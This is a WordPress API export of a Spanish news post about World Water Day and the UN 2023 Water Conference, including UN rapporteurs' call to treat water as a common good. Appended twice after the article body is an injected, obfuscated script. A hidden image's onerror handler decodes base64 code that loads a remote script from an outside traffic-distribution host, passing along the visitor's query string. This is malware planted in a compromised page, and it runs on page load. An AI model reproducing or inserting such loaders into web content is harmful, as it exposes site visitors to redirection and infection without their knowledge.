{"id":2378,"date":"2023-03-22T12:07:50","date_gmt":"2023-03-22T15:07:50","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2378"},"modified":"2025-08-14T00:20:49","modified_gmt":"2025-08-14T03:20:49","slug":"sin-agua-no-hay-vida-22-de-marzo-dia-mundial-del-agua","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2378","title":{"rendered":"Sin agua no hay vida: 22 de marzo, d\u00eda mundial del agua&#8230;"},"content":{"rendered":"\n<h3 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>Como cada<strong>&nbsp;22 de marzo<\/strong>,&nbsp;fecha en la que se celebra el&nbsp;<strong><a href=\"https:\/\/weekend.perfil.com\/noticias\/naturaleza\/por-que-se-celebra-hoy-el-dia-mundial-de-la-vida-silvestre.phtml\" target=\"_blank\" rel=\"noreferrer noopener\">D\u00eda&nbsp;<\/a>Mundial del Agu<\/strong>a,&nbsp;desde la Organizaci\u00f3n de las Naciones Unidas (ONU) se insiste en recordar que el agua es un&nbsp;<strong>recurso esencial en nuestras vidas<\/strong>&nbsp;por lo que debemos cuidar al extremo cada gota.&nbsp;<\/em><\/h3>\n\n\n\n<p>Si bien el D\u00eda Mundial del Agua&nbsp;fue proclamado por la&nbsp;<a rel=\"noreferrer noopener\" href=\"https:\/\/www.un.org\/es\/\" target=\"_blank\">ONU&nbsp;<\/a><strong>en 1992<\/strong>&nbsp;cuando se celebr\u00f3 en R\u00edo de Janeiro la&nbsp;<strong>Conferencia de las Naciones Unidas sobre el Medio Ambiente y el Desarrollo<\/strong>, reci\u00e9n en 1993 comenz\u00f3 a celebrarse oficialmente en todo el mundo.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/asicotur.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2021\/09\/202109-ASICOTUR-banner.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>Posteriormente tuvieron lugar otras menciones como el&nbsp;A\u00f1o Internacional de Cooperaci\u00f3n en la Esfera del Agua 2013&nbsp;y el&nbsp;Decenio \u201cAgua para el Desarrollo Sostenible\u201d, 2018-2028. Todo esto remarca la idea de la ONU que el agua es&nbsp;<strong>fundamental para el desarrollo y la paz mundial.<\/strong><\/p>\n\n\n\n<p>Esta celebraci\u00f3n tiene por objetivo concienciar acerca de la crisis mundial del agua y la necesidad de buscar medidas para abordarla&nbsp;de manera que alcancemos el&nbsp;<strong>Objetivo de Desarrollo Sostenible N\u00aa 6: Agua y saneamiento para todos, antes de 2030<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-embed alignright is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"UN 2023 Water Conference - First Online Stakeholders Briefing\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/bfEqzxSsKRI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>A pesar de que todas las actividades sociales y econ\u00f3micas dependen en gran medida del abastecimiento de agua dulce y de su calidad,&nbsp;seg\u00fan cifras oficiales de la ONU &nbsp;en el mundo hay 2. 200 millones de personas que viven sin acceso al agua potable.<\/p>\n\n\n\n<p><strong><em>Para la ONU: El agua es un bien com\u00fan, no una mercanc\u00eda, aseguran expertos de la ONU<\/em><\/strong><\/p>\n\n\n\n<p>\u201cConsiderar el agua como una mercanc\u00eda o una oportunidad de negocio dejar\u00e1 atr\u00e1s a aquellos que no pueden acceder o permitirse los precios del mercado\u201d, han asegurado varios expertos* de la ONU en derechos humanos en una declaraci\u00f3n emitida un d\u00eda antes de que comience la&nbsp;<a href=\"https:\/\/sdgs.un.org\/conferences\/water2023?_gl=1*1qxcxps*_ga*MTU1Nzg1NDc4MS4xNjU5NTM1MTMx*_ga_TK9BQL5X7Z*MTY3OTQ5NTM5Mi4zLjAuMTY3OTQ5NTM5Mi4wLjAuMA..\" target=\"_blank\" rel=\"noreferrer noopener\">Conferencia sobre el Agua 2023<\/a>&nbsp;en Nueva York.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/sdgs.un.org\/conferences\/water2023?_gl=1*1qxcxps*_ga*MTU1Nzg1NDc4MS4xNjU5NTM1MTMx*_ga_TK9BQL5X7Z*MTY3OTQ5NTM5Mi4zLjAuMTY3OTQ5NTM5Mi4wLjAuMA..\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/03\/Captura-web_22-3-2023_114539_sdgs.un_.org_.jpeg\" alt=\"\" class=\"wp-image-13019\"\/><\/a><\/figure>\n\n\n\n<p>Para los relatores, la mercantilizaci\u00f3n del agua desbaratar\u00e1 la consecuci\u00f3n de los&nbsp;<a href=\"https:\/\/news.un.org\/es\/news\/topic\/sdgs\" target=\"_blank\" rel=\"noreferrer noopener\">Objetivos de Desarrollo Sostenible<\/a>, entre ellos el n\u00famero 6, dedicado al acceso universal al agua limpia y el saneamiento.<\/p>\n\n\n\n<p>Adem\u00e1s, \u201c<strong>obstaculizar\u00e1 los esfuerzos para resolver la crisis mundial del agua<\/strong>, ya agravada por la triple crisis planetaria: el cambio clim\u00e1tico, la p\u00e9rdida de naturaleza y biodiversidad, y la contaminaci\u00f3n t\u00f3xica, que afecta a la vida y la salud de miles de millones de personas en todo el mundo\u201d.&nbsp;<\/p>\n\n\n\n<p>Los expertos se\u00f1alan que, como se mencionaba en una reciente carta abierta del Alto Comisionado de las Naciones Unidas para los Derechos Humanos a los Estados miembros, la Conferencia sobre el Agua es una \u201coportunidad \u00fanica en la vida\u201d para abordar las causas profundas de esta crisis que afecta actualmente a 2000 millones de personas sin acceso garantizado al agua potable y m\u00e1s de 4000 millones sin saneamiento b\u00e1sico.<\/p>\n\n\n\n<p>\u201cNuestra esperanza es que la Conferencia sobre el Agua sea el comienzo de una colaboraci\u00f3n genuina y a largo plazo para acelerar la implementaci\u00f3n del Objetivo n\u00famero 6 y promover y proteger los derechos humanos\u201d, aseguraron.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">INTERDEPENDENCIA DE LOS DERECHOS<\/h2>\n\n\n\n<p>Los expertos tambi\u00e9n han declarado que&nbsp;<strong>los derechos humanos y el derecho al agua y al saneamiento son indivisibles<\/strong>&nbsp;e interdependientes, y vitales para alcanzar un nivel de vida adecuado.<\/p>\n\n\n\n<p>\u201cYa se trate de la seguridad f\u00edsica de las mujeres y las ni\u00f1as, de la discriminaci\u00f3n contra los pueblos ind\u00edgenas, los campesinos o las minor\u00edas, o de los derechos humanos a la salud, a una vivienda adecuada, a un medio ambiente limpio, saludable y sostenible, a la educaci\u00f3n y muchos otros, todos est\u00e1n \u00edntimamente relacionados con el agua y el saneamiento\u201d, explican.<\/p>\n\n\n\n<p>Por primera vez en casi 50 a\u00f1os, las Naciones Unidas convocan una conferencia de tres d\u00edas en Nueva York para analizar la situaci\u00f3n mundial del agua y el progreso hacia los Objetivos de Desarrollo Sostenible que forman parte de la Agenda 2030.<\/p>\n\n\n\n<p>\u201cAcogemos con satisfacci\u00f3n los esfuerzos de la ONU, los Estados, los titulares de derechos y otras partes interesadas de todo el mundo para reunirse en Nueva York y avanzar en la agenda mundial del agua\u201d, aseguran.<\/p>\n\n\n\n<p>Sin embargo, el progreso en el Objetivo n\u00famero 6, \u201cs\u00f3lo puede ocurrir de manera efectiva&nbsp;<strong>si las comunidades y sus derechos humanos est\u00e1n en el centro de las discusiones<\/strong>, especialmente escuchando las voces de aquellos que sufren discriminaci\u00f3n, marginaci\u00f3n, pobreza y situaciones de vulnerabilidad\u201d.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">BASTA DE TECNOCRACIA<\/h2>\n\n\n\n<p>Para los expertos, la Conferencia es una oportunidad para&nbsp;<strong>escuchar y comprometerse con los defensores de los derechos humanos<\/strong>, en particular los defensores de los derechos del agua, y otros titulares de derechos.<\/p>\n\n\n\n<p>\u201cEn lugar de restringir la libertad de expresi\u00f3n y asociaci\u00f3n de los defensores de los derechos humanos y los derechos al agua, e incluso criminalizarlos, es hora de garantizar su participaci\u00f3n significativa, especialmente para las mujeres y los j\u00f3venes defensores de los derechos humanos, en todos los debates y en cualquier resultado y mecanismos de gobernanza del agua a nivel internacional, nacional y local\u201d.<\/p>\n\n\n\n<p>En este contexto, han explicado, se necesitan&nbsp;<strong>marcos s\u00f3lidos de acceso p\u00fablico a la informaci\u00f3n<\/strong>&nbsp;para fomentar la transparencia, la participaci\u00f3n y la rendici\u00f3n de cuentas.<\/p>\n\n\n\n<p>Los expertos han hecho un llamamiento para&nbsp;<strong>poner fin a un enfoque tecnocr\u00e1tico del agua<\/strong>&nbsp;y tener en cuenta \u201clas ideas, los conocimientos y las soluciones de los pueblos ind\u00edgenas, los campesinos y las comunidades locales que entienden los ecosistemas acu\u00e1ticos locales para garantizar la sostenibilidad de la agenda 2030\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/03\/Captura-web_22-3-2023_114341_news.un_.org_.jpeg\" alt=\"\" class=\"wp-image-13018\"\/><\/figure>\n\n\n\n<p>*Los expertos: Pedro Arrojo-Agudo, relator especial sobre los derechos humanos al agua potable y al saneamiento; Marcos Orellana, relator especial sobre las sustancias t\u00f3xicas y los derechos humanos; Olivier De Schutter, relator especial sobre la extrema pobreza y los derechos humanos; David R. Boyd, relator especial sobre los derechos humanos y el medio ambiente; Ian Fry, relator especial sobre la promoci\u00f3n y protecci\u00f3n de los derechos humanos en el contexto del cambio clim\u00e1tico; Reem Alsalem, relator especial sobre la violencia contra las mujeres y las ni\u00f1as, sus causas y consecuencias; Tlaleng Mofokeng, relator especial sobre el derecho de toda persona al disfrute del m\u00e1s alto nivel posible de salud f\u00edsica y mental; Jos\u00e9 Francisco Cali Tzay, Relator Especial sobre los derechos de los pueblos ind\u00edgenas; Balakrishan Rajagopal, relator especial sobre el derecho a una vivienda adecuada; Cl\u00e9ment Nyaletsossi Voule, relator especial sobre los derechos a la libertad de reuni\u00f3n pac\u00edfica y de asociaci\u00f3n; Michael Fakhri, relator especial sobre el derecho a la alimentaci\u00f3n; Mary Lawlor, relatora especial sobre la situaci\u00f3n de los defensores de los derechos humanos; Irene Khan, relatora especial de la ONU para la libertad de opini\u00f3n y de expresi\u00f3n; Fernand de Varennes, relator especial sobre cuestiones de las minor\u00edas; Dorothy Estrada Tanck (presidenta), Elizabeth Broderick, Ivana Rada\u010di\u0107, Meskerem Geset Techane y Melissa Upreti, del Grupo de Trabajo sobre la discriminaci\u00f3n contra las mujeres y las ni\u00f1as.&nbsp;<\/p>\n\n\n\n<p><em>Los Relatores Especiales, Expertos Independientes y Grupos de Trabajo forman parte de lo que se conoce como Procedimientos Especiales del&nbsp;<a href=\"https:\/\/www.ohchr.org\/SP\/HRBodies\/HRC\/Pages\/Home.aspx\" target=\"_blank\" rel=\"noreferrer noopener\">Consejo de Derechos Humanos<\/a>.<\/em><em>&nbsp;Procedimientos Especiales, el mayor \u00f3rgano de expertos independientes del sistema de Derechos Humanos de la ONU, es el nombre general de los mecanismos independientes de investigaci\u00f3n y seguimiento del Consejo que se ocupan de situaciones espec\u00edficas de p<\/em><em>a\u00edses o de cuestiones tem\u00e1ticas en todas las partes del mundo. Los expertos de los Procedimientos Especiales trabajan de forma voluntaria; no son personal de la ONU y no reciben un salario por su trabajo. Son independientes de cualquier gobierno u organiza<\/em><em>ci\u00f3n y prestan sus servicios a t\u00edtulo individual.<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/news.un.org\/es\/story\/2023\/03\/1519562?utm_source=Noticias+ONU+-+Bolet%C3%ADn&amp;utm_campaign=048555abd1-EMAIL_CAMPAIGN_2023_03_22_12_05&amp;utm_medium=email&amp;utm_term=0_e7f6cb3d3c-048555abd1-%5BLIST_EMAIL_ID%5D\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2021\/10\/ONU.jpg\" alt=\"\" class=\"wp-image-8730\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Como cada&nbsp;22 de marzo,&nbsp;fecha en la que se celebra el&nbsp;D\u00eda&nbsp;Mundial del Agua,&nbsp;desde la Organizaci\u00f3n de las Naciones Unidas (ONU) se insiste en recordar que el agua es un&nbsp;recurso esencial en nuestras vidas&nbsp;por lo que debemos cuidar al extremo cada gota.&nbsp; Si bien el D\u00eda Mundial del Agua&nbsp;fue proclamado por la&nbsp;ONU&nbsp;en 1992&nbsp;cuando se celebr\u00f3 en R\u00edo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2381,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[19,17],"tags":[],"class_list":{"0":"post-2378","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-salud-bienestar","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2378"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2378"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2378\/revisions"}],"predecessor-version":[{"id":7140,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2378\/revisions\/7140"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2381"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2378"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2378"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2378"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}